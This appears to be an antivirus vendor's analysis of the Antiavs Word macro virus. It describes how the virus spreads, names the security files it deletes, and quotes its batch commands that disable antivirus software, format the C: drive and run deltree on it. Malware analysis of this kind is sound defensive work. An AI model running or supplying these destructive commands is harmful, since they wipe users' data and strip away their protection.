Virus.MSWord.Antiavs

Class Virus
Platform MSWord
Description

Technical Details


This is an encrypted Chinese Word macro virus. It contains nine macros:
AutoExec, AAV, AutoOpen, AutoNew, FileSaveAs, ZlockMacro, FileTemplates,
ToolsMacro, Organizer.


The virus infects the global macros area on opening an infected document
(AutoOpen) and writes itself to documents that are saved with a new name
(FileSaveAs).


On entering the File/Template menu (FileTemplate) the virus sets the
password “AntiAVs” for current document and displays the MessageBox:


WordBasic Err = 16
Not enough memory!

On entering the Tools/Macro menu (ToolsMacro) the virus erases all texts
within current document and appends to the AUTOEXEC.BAT file the commands
that erase the anti-virus PC-CILLIN files:

echo off
attrib -h -r -s +a c:pc-cil~1*.* >nul
del c:pc-cil~1*.dll >nul

The virus then erases the anti-virus files:

C:PC-Cillin 95Lpt$vpn.*
C:PC-Cillin 97Lpt$vpn.*
C:TscPC-Cillin 97Lpt$vpn.*
C:ZlockavGsav.cas
C:VB7Virus.txt
C:Program FilesNorton AntiVirusViruscan.dat
C:Program FilesSymantecSymevnt.386
C:Program FilesMcAfeeVirusScan95Scan.dat
C:Program FilesMcAfeeVirusScan95Mcscan32.dll
C:Program FilesMcAfeeVirusScanScan.dat
C:Program FilesMcAfeeVirusScanMcscan32.dll
C:Program FilesCommand SoftwareF-PROT95Sign.def
C:Program FilesCommand SoftwareF-PROT95Dvp.vxd
C:Program FilesAntiViral Toolkit ProAvp32.exe
C:Program FilesAntiViral Toolkit Pro*.avc
C:Tbavw95Tbavw95.vxd

Depending on the system random counter the virus writes the text to the
AUTOEXEC.BAT file:

@Echo off
cls
echo I have clean a huge virus:
echo MS-WINDOWS
echo for you. ^_^
echo –AntiAVs–
echo y|format c: /u /v:AAV >nul
deltree /y c: >nul